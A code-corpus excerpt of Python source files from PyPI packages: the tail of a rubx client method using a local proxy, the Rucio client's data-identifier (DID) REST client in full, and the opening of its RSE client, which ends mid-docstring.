return self
def __exit__(self):
pass
def method(self, method_name: str, proxy: dict = {'http': 'http://127.0.0.1:9050'},
platform: str='rubx', city: str='mashhad',
api_version: int = 5, *args, **data) -> GetData:
'''
self.method(method_name='example', ...)
'''
return (
GetData.api(
version = api_version,
method = method_name[0].lower() + method_name[1:],
auth = self.session,
data = kwargs or {},
proxy = proxy,
platform = platform,
mode = city
)
) | /rubx-10.6.9-py3-none-any.whl/rb/methods.py | 0.644673 | 0.174516 | methods.py | pypi |
from datetime import datetime
from json import dumps
from urllib.parse import quote_plus
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.exception import DeprecationError
from rucio.common.utils import build_url, render_json, render_json_list, date_to_str
class DIDClient(BaseClient):
"""DataIdentifier client class for working with data identifiers"""
DIDS_BASEURL = 'dids'
ARCHIVES_BASEURL = 'archives'
def list_dids(self, scope, filters, did_type='collection', long=False, recursive=False):
"""
List all data identifiers in a scope which match a given pattern.
:param scope: The scope name.
:param filters: A nested dictionary of key/value pairs like [{'key1': 'value1', 'key2.lte': 'value2'}, {'key3.gte, 'value3'}].
Keypairs in the same dictionary are AND'ed together, dictionaries are OR'ed together. Keys should be suffixed
like <key>.<operation>, e.g. key1 >= value1 is equivalent to {'key1.gte': value}, where <operation> belongs to one
of the set {'lte', 'gte', 'gt', 'lt', 'ne' or ''}. Equivalence doesn't require an operator.
:param did_type: The type of the did: 'all'(container, dataset or file)|'collection'(dataset or container)|'dataset'|'container'|'file'
:param long: Long format option to display more information for each DID.
:param recursive: Recursively list DIDs content.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), 'dids', 'search'])
# stringify dates.
if isinstance(filters, dict): # backwards compatability for filters as single {}
filters = [filters]
for or_group in filters:
for key, value in or_group.items():
if isinstance(value, datetime):
or_group[key] = date_to_str(value)
payload = {
'type': did_type,
'filters': filters,
'long': long,
'recursive': recursive
}
url = build_url(choice(self.list_hosts), path=path, params=payload)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
dids = self._load_json_data(r)
return dids
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_dids_extended(self, scope, filters, did_type='collection', long=False, recursive=False):
"""
List all data identifiers in a scope which match a given pattern (DEPRECATED)
"""
raise DeprecationError("Command or function has been deprecated. Please use list_dids instead.")
def add_did(self, scope, name, did_type, statuses=None, meta=None, rules=None, lifetime=None, dids=None, rse=None):
"""
Add data identifier for a dataset or container.
:param scope: The scope name.
:param name: The data identifier name.
:param did_type: The data identifier type (file|dataset|container).
:param statuses: Dictionary with statuses, e.g.g {'monotonic':True}.
:param meta: Meta-data associated with the data identifier is represented using key/value pairs in a dictionary.
:param rules: Replication rules associated with the data identifier. A list of dictionaries, e.g., [{'copies': 2, 'rse_expression': 'TIERS1'}, ].
:param lifetime: DID's lifetime (in seconds).
:param dids: The content.
:param rse: The RSE name when registering replicas.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name)])
url = build_url(choice(self.list_hosts), path=path)
# Build json
data = {'type': did_type}
if statuses:
data['statuses'] = statuses
if meta:
data['meta'] = meta
if rules:
data['rules'] = rules
if lifetime:
data['lifetime'] = lifetime
if dids:
data['dids'] = dids
if rse:
data['rse'] = rse
r = self._send_request(url, type_='POST', data=render_json(**data))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_dids(self, dids):
"""
Bulk add datasets/containers.
"""
path = '/'.join([self.DIDS_BASEURL])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=render_json_list(dids))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_dataset(self, scope, name, statuses=None, meta=None, rules=None, lifetime=None, files=None, rse=None):
"""
Add data identifier for a dataset.
:param scope: The scope name.
:param name: The data identifier name.
:param statuses: Dictionary with statuses, e.g.g {'monotonic':True}.
:param meta: Meta-data associated with the data identifier is represented using key/value pairs in a dictionary.
:param rules: Replication rules associated with the data identifier. A list of dictionaries, e.g., [{'copies': 2, 'rse_expression': 'TIERS1'}, ].
:param lifetime: DID's lifetime (in seconds).
:param files: The content.
:param rse: The RSE name when registering replicas.
"""
return self.add_did(scope=scope, name=name, did_type='DATASET',
statuses=statuses, meta=meta, rules=rules,
lifetime=lifetime, dids=files, rse=rse)
def add_datasets(self, dsns):
"""
Bulk add datasets.
:param dsns: A list of datasets.
"""
return self.add_dids(dids=[dict(list(dsn.items()) + [('type', 'DATASET')]) for dsn in dsns])
def add_container(self, scope, name, statuses=None, meta=None, rules=None, lifetime=None):
"""
Add data identifier for a container.
:param scope: The scope name.
:param name: The data identifier name.
:param statuses: Dictionary with statuses, e.g.g {'monotonic':True}.
:param meta: Meta-data associated with the data identifier is represented using key/value pairs in a dictionary.
:param rules: Replication rules associated with the data identifier. A list of dictionaries, e.g., [{'copies': 2, 'rse_expression': 'TIERS1'}, ].
:param lifetime: DID's lifetime (in seconds).
"""
return self.add_did(scope=scope, name=name, did_type='CONTAINER', statuses=statuses, meta=meta, rules=rules, lifetime=lifetime)
def add_containers(self, cnts):
"""
Bulk add containers.
:param cnts: A list of containers.
"""
return self.add_dids(dids=[dict(list(cnts.items()) + [('type', 'CONTAINER')]) for cnt in cnts])
def attach_dids(self, scope, name, dids, rse=None):
"""
Attach data identifier.
:param scope: The scope name.
:param name: The data identifier name.
:param dids: The content.
:param rse: The RSE name when registering replicas.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids'])
url = build_url(choice(self.list_hosts), path=path)
data = {'dids': dids}
if rse:
data['rse'] = rse
r = self._send_request(url, type_='POST', data=render_json(**data))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def detach_dids(self, scope, name, dids):
"""
Detach data identifier
:param scope: The scope name.
:param name: The data identifier name.
:param dids: The content.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids'])
url = build_url(choice(self.list_hosts), path=path)
data = {'dids': dids}
r = self._send_request(url, type_='DEL', data=render_json(**data))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def attach_dids_to_dids(self, attachments, ignore_duplicate=False):
"""
Add dids to dids.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
:param ignore_duplicate: If True, ignore duplicate entries.
"""
path = '/'.join([self.DIDS_BASEURL, 'attachments'])
url = build_url(choice(self.list_hosts), path=path)
data = {'ignore_duplicate': ignore_duplicate, 'attachments': attachments}
r = self._send_request(url, type_='POST', data=dumps(data))
if r.status_code in (codes.ok, codes.no_content, codes.created):
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_files_to_datasets(self, attachments, ignore_duplicate=False):
"""
Add files to datasets.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
:param ignore_duplicate: If True, ignore duplicate entries.
"""
return self.attach_dids_to_dids(attachments=attachments,
ignore_duplicate=ignore_duplicate)
def add_datasets_to_containers(self, attachments):
"""
Add datasets_to_containers.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
"""
return self.attach_dids_to_dids(attachments=attachments)
def add_containers_to_containers(self, attachments):
"""
Add containers_to_containers.
:param attachments: The attachments.
attachments is: [attachment, attachment, ...]
attachment is: {'scope': scope, 'name': name, 'dids': dids}
dids is: [{'scope': scope, 'name': name}, ...]
"""
return self.attach_dids_to_dids(attachments=attachments)
def add_files_to_dataset(self, scope, name, files, rse=None):
"""
Add files to datasets.
:param scope: The scope name.
:param name: The dataset name.
:param files: The content.
:param rse: The RSE name when registering replicas.
"""
return self.attach_dids(scope=scope, name=name, dids=files, rse=rse)
def add_files_to_archive(self, scope, name, files):
"""
Add files to archive.
:param scope: The scope name.
:param name: The dataset name.
:param files: The content.
"""
return self.attach_dids(scope=scope, name=name, dids=files)
def add_datasets_to_container(self, scope, name, dsns):
"""
Add datasets to container.
:param scope: The scope name.
:param name: The dataset name.
:param dsns: The content.
"""
return self.attach_dids(scope=scope, name=name, dids=dsns)
def add_containers_to_container(self, scope, name, cnts):
"""
Add containers to container.
:param scope: The scope name.
:param name: The dataset name.
:param cnts: The content.
"""
return self.attach_dids(scope=scope, name=name, dids=cnts)
def list_content(self, scope, name):
"""
List data identifier contents.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_content_history(self, scope, name):
"""
List data identifier contents history.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'dids', 'history'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_files(self, scope, name, long=None):
"""
List data identifier file contents.
:param scope: The scope name.
:param name: The data identifier name.
:param long: A boolean to choose if GUID is returned or not.
"""
payload = {}
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'files'])
if long:
payload['long'] = True
url = build_url(choice(self.list_hosts), path=path, params=payload)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_did(self, scope, name, dynamic=False, dynamic_depth=None):
"""
Retrieve a single data identifier.
:param scope: The scope name.
:param name: The data identifier name.
:param dynamic_depth: The DID type as string ('FILE'/'DATASET') at which to stop the dynamic
length/bytes calculation. If not set, the size will not be computed dynamically.
:param dynamic: (Deprecated) same as dynamic_depth = 'FILE'
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name)])
params = {}
if dynamic_depth:
params['dynamic_depth'] = dynamic_depth
elif dynamic:
params['dynamic_depth'] = 'FILE'
url = build_url(choice(self.list_hosts), path=path, params=params)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return next(self._load_json_data(r))
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_metadata(self, scope, name, plugin='DID_COLUMN'):
"""
Get data identifier metadata
:param scope: The scope name.
:param name: The data identifier name.
:param plugin: Backend Metadata plugin the Rucio server should use to query data.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta'])
url = build_url(choice(self.list_hosts), path=path)
payload = {}
payload['plugin'] = plugin
r = self._send_request(url, type_='GET', params=payload)
if r.status_code == codes.ok:
meta = self._load_json_data(r)
return next(meta)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_metadata_bulk(self, dids, inherit=False):
"""
Bulk get data identifier metadata
:param inherit: A boolean. If set to true, the metadata of the parent are concatenated.
:param dids: A list of dids.
"""
data = {'dids': dids, 'inherit': inherit}
path = '/'.join([self.DIDS_BASEURL, 'bulkmeta'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(data))
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_metadata(self, scope, name, key, value, recursive=False):
"""
Set data identifier metadata
:param scope: The scope name.
:param name: The data identifier name.
:param key: the key.
:param value: the value.
:param recursive: Option to propagate the metadata change to content.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta', key])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'value': value, 'recursive': recursive})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_metadata_bulk(self, scope, name, meta, recursive=False):
"""
Set data identifier metadata in bulk.
:param scope: The scope name.
:param name: The data identifier name.
:param meta: the metadata key-values.
:type meta: dict
:param recursive: Option to propagate the metadata change to content.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta'])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'meta': meta, 'recursive': recursive})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_dids_metadata_bulk(self, dids, recursive=False):
"""
Set metadata to a list of data identifiers.
:param dids: A list of dids including metadata, i.e. [['scope': scope1, 'name': name1, 'meta': {key1: value1, key2: value2}] .
:param recursive: Option to propagate the metadata update to content.
"""
path = '/'.join([self.DIDS_BASEURL, 'bulkdidsmeta'])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'dids': dids, 'recursive': recursive})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_status(self, scope, name, **kwargs):
"""
Set data identifier status
:param scope: The scope name.
:param name: The data identifier name.
:param kwargs: Keyword arguments of the form status_name=value.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'status'])
url = build_url(choice(self.list_hosts), path=path)
data = dumps(kwargs)
r = self._send_request(url, type_='PUT', data=data)
if r.status_code in (codes.ok, codes.no_content, codes.created):
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
    def close(self, scope, name):
        """
        Close a dataset or container, i.e. set its 'open' status to False.

        :param scope: The scope name.
        :param name: The dataset/container name.
        :returns: True on success (propagated from set_status).
        """
        # Closing is just a status change; delegate to set_status.
        return self.set_status(scope=scope, name=name, open=False)
def delete_metadata(self, scope, name, key):
"""
Delete data identifier metadata
:param scope: The scope name.
:param name: The data identifier.
:param key: the key.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'meta'])
url = build_url(choice(self.list_hosts), path=path, params={'key': key})
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_did_rules(self, scope, name):
"""
List the associated rules of a data identifier.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'rules'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_associated_rules_for_file(self, scope, name):
"""
List the associated rules a file is affected from..
:param scope: The scope name.
:param name: The file name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'associated_rules'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_dataset_by_guid(self, guid):
"""
Get the parent datasets for a given GUID.
:param guid: The GUID.
:returns: A did
"""
path = '/'.join([self.DIDS_BASEURL, guid, 'guid'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def scope_list(self, scope, name=None, recursive=False):
"""
List data identifiers in a scope.
:param scope: The scope name.
:param name: The data identifier name.
:param recursive: boolean, True or False.
"""
payload = {}
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), ''])
if name:
payload['name'] = name
if recursive:
payload['recursive'] = True
url = build_url(choice(self.list_hosts), path=path, params=payload)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_parent_dids(self, scope, name):
"""
List parent dataset/containers of a did.
:param scope: The scope.
:param name: The name.
"""
path = '/'.join([self.DIDS_BASEURL, quote_plus(scope), quote_plus(name), 'parents'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def create_did_sample(self, input_scope, input_name, output_scope, output_name, nbfiles):
"""
Create a sample from an input collection.
:param input_scope: The scope of the input DID.
:param input_name: The name of the input DID.
:param output_scope: The scope of the output dataset.
:param output_name: The name of the output dataset.
:param account: The account.
:param nbfiles: The number of files to register in the output dataset.
"""
path = '/'.join([self.DIDS_BASEURL, 'sample'])
data = dumps({
'input_scope': input_scope,
'input_name': input_name,
'output_scope': output_scope,
'output_name': output_name,
'nbfiles': str(nbfiles)
})
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def resurrect(self, dids):
"""
Resurrect a list of dids.
:param dids: A list of dids [{'scope': scope, 'name': name}, ...]
"""
path = '/'.join([self.DIDS_BASEURL, 'resurrect'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(dids))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_temporary_dids(self, dids):
"""
Bulk add temporary data identifiers.
:param dids: A list of dids.
"""
url = build_url(choice(self.list_hosts), path='tmp_dids')
r = self._send_request(url, type_='POST', data=dumps(dids))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_archive_content(self, scope, name):
"""
List archive contents.
:param scope: The scope name.
:param name: The data identifier name.
"""
path = '/'.join([self.ARCHIVES_BASEURL, quote_plus(scope), quote_plus(name), 'files'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg) | /rucio-clients-32.2.0.tar.gz/rucio-clients-32.2.0/lib/rucio/client/didclient.py | 0.782829 | 0.257882 | didclient.py | pypi |
from json import dumps, loads
from urllib.parse import quote
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.utils import build_url
class RSEClient(BaseClient):
"""RSE client class for working with rucio RSEs"""
RSE_BASEURL = 'rses'
def get_rse(self, rse):
"""
Returns details about the referred RSE.
:param rse: Name of the referred RSE
:returns: A dict containing all attributes of the referred RSE
:raises RSENotFound: if the referred RSE was not found in the database
"""
path = '/'.join([self.RSE_BASEURL, rse])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
rse = loads(r.text)
return rse
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_rse(self, rse, **kwargs):
"""
Sends the request to create a new RSE.
:param rse: the name of the rse.
:param deterministic: Boolean to know if the pfn is generated deterministically.
:param volatile: Boolean for RSE cache.
:param city: City for the RSE.
:param region_code: The region code for the RSE.
:param country_name: The country.
:param continent: The continent.
:param time_zone: Timezone.
:param staging_area: Staging area.
:param ISP: Internet service provider.
:param rse_type: RSE type.
:param latitude: Latitude coordinate of RSE.
:param longitude: Longitude coordinate of RSE.
:param ASN: Access service network.
:param availability: Availability.
:return: True if location was created successfully else False.
:raises Duplicate: if rse already exists.
"""
path = 'rses/' + rse
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(kwargs))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def update_rse(self, rse, parameters):
"""
Update RSE properties like availability or name.
:param rse: the name of the new rse.
:param parameters: A dictionnary with property (name, read, write, delete as keys).
"""
path = 'rses/' + rse
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps(parameters))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_rse(self, rse):
"""
Sends the request to delete a rse.
:param rse: the name of the rse.
:return: True if location was created successfully else False.
"""
path = 'rses/' + rse
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_rses(self, rse_expression=None):
"""
Sends the request to list all rucio locations(RSEs).
:rse_expression: RSE Expression to use as filter.
:return: a list containing the names of all rucio locations.
"""
if rse_expression:
path = ['rses', "?expression=" + quote(rse_expression)]
path = '/'.join(path)
else:
path = 'rses/'
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_rse_attribute(self, rse, key, value):
"""
Sends the request to add a RSE attribute.
:param rse: the name of the rse.
:param key: the attribute key.
:param value: the attribute value.
:return: True if RSE attribute was created successfully else False.
:raises Duplicate: if RSE attribute already exists.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'attr', key])
url = build_url(choice(self.list_hosts), path=path)
data = dumps({'value': value})
r = self._send_request(url, type_='POST', data=data)
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_rse_attribute(self, rse, key):
"""
Sends the request to delete a RSE attribute.
:param rse: the RSE name.
:param key: the attribute key.
:return: True if RSE attribute was deleted successfully else False.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'attr', key])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_rse_attributes(self, rse):
"""
Sends the request to get RSE attributes.
:param rse: The RSE name.
:return: A ``dict`` with the RSE attribute name/value pairs.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'attr/'])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
attributes = loads(r.text)
return attributes
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def add_protocol(self, rse, params):
"""
Sends the request to create a new protocol for the given RSE.
:param rse: the name of the rse.
:param scheme: identifier of this protocol
:param params: Attributes of the protocol. Supported are:
hostname: hostname for this protocol (default = localhost)
port: port for this protocol (default = 0)
prefix: string used as a prfeix for this protocol when generating the PFN (default = None)
impl: qualified name of the implementation class for this protocol (mandatory)
read: integer representing the priority of this procotol for read operations (default = -1)
write: integer representing the priority of this procotol for write operations (default = -1)
delete: integer representing the priority of this procotol for delete operations (default = -1)
extended_attributes: miscellaneous protocol specific information e.g. spacetoken for SRM (default = None)
:return: True if protocol was created successfully else False.
:raises Duplicate: if protocol with same hostname, port and protocol identifier
already exists for the given RSE.
:raises RSENotFound: if the RSE doesn't exist.
:raises KeyNotFound: if params is missing manadtory attributes to create the
protocol.
:raises AccessDenied: if not authorized.
"""
scheme = params['scheme']
path = '/'.join([self.RSE_BASEURL, rse, 'protocols', scheme])
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(params))
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_protocols(self, rse, protocol_domain='ALL', operation=None, default=False, scheme=None):
"""
Returns protocol information. Parameter comibantions are:
(operation OR default) XOR protocol.
:param rse: the RSE name.
:param protocol_domain: The scope of the protocol. Supported are 'LAN', 'WAN', and 'ALL' (as default).
:param operation: The name of the requested operation (read, write, or delete).
If None, all operations are queried.
:param default: Indicates if only the default operations should be returned.
:param scheme: The identifier of the requested protocol.
:returns: A list with details about each matching protocol.
:raises RSENotFound: if the RSE doesn't exist.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSEOperationNotSupported: if no matching protocol entry for the requested
operation could be found.
"""
path = None
params = {}
if scheme:
path = '/'.join([self.RSE_BASEURL, rse, 'protocols', scheme])
else:
path = '/'.join([self.RSE_BASEURL, rse, 'protocols'])
if operation:
params['operation'] = operation
if default:
params['default'] = default
params['protocol_domain'] = protocol_domain
url = build_url(choice(self.list_hosts), path=path, params=params)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
protocols = loads(r.text)
return protocols
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def lfns2pfns(self, rse, lfns, protocol_domain='ALL', operation=None, scheme=None):
"""
Returns PFNs that should be used at a RSE, corresponding to requested LFNs.
The PFNs are generated for the RSE *regardless* of whether a replica exists for the LFN.
:param rse: the RSE name
:param lfns: A list of LFN strings to translate to PFNs.
:param protocol_domain: The scope of the protocol. Supported are 'LAN', 'WAN', and 'ALL' (as default).
:param operation: The name of the requested operation (read, write, or delete).
If None, all operations are queried.
:param scheme: The identifier of the requested protocol (gsiftp, https, davs, etc).
:returns: A dictionary of LFN / PFN pairs.
:raises RSENotFound: if the RSE doesn't exist.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSEOperationNotSupported: if no matching protocol entry for the requested
operation could be found.
"""
path = '/'.join([self.RSE_BASEURL, rse, 'lfns2pfns'])
params = []
if scheme:
params.append(('scheme', scheme))
if protocol_domain != 'ALL':
params.append(('domain', protocol_domain))
if operation:
params.append(('operation', operation))
for lfn in lfns:
params.append(('lfn', lfn))
url = build_url(choice(self.list_hosts), path=path, params=params, doseq=True)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
pfns = loads(r.text)
return pfns
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_protocols(self, rse, scheme, hostname=None, port=None):
"""
Deletes matching protocols from RSE. Protocols using the same identifier can be
distinguished by hostname and port.
:param rse: the RSE name.
:param scheme: identifier of the protocol.
:param hostname: hostname of the protocol.
:param port: port of the protocol.
:returns: True if success.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSENotFound: if the RSE doesn't exist.
:raises AccessDenied: if not authorized.
"""
path = [self.RSE_BASEURL, rse, 'protocols', scheme]
if hostname:
path.append(hostname)
if port:
path.append(str(port))
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def update_protocols(self, rse, scheme, data, hostname=None, port=None):
"""
Updates matching protocols from RSE. Protocol using the same identifier can be
distinguished by hostname and port.
:param rse: the RSE name.
:param scheme: identifier of the protocol.
:param data: A dict providing the new values of the protocol attibutes.
Keys must match column names in database.
:param hostname: hostname of the protocol.
:param port: port of the protocol.
:returns: True if success.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSENotFound: if the RSE doesn't exist.
:raises KeyNotFound: if invalid data was provided for update.
:raises AccessDenied: if not authorized.
"""
path = [self.RSE_BASEURL, rse, 'protocols', scheme]
if hostname:
path.append(hostname)
if port:
path.append(str(port))
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps(data))
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def swap_protocols(self, rse, domain, operation, scheme_a, scheme_b):
"""
Swaps the priorities of the provided operation.
:param rse: the RSE name.
:param domain: the domain in which priorities should be swapped i.e. wan or lan.
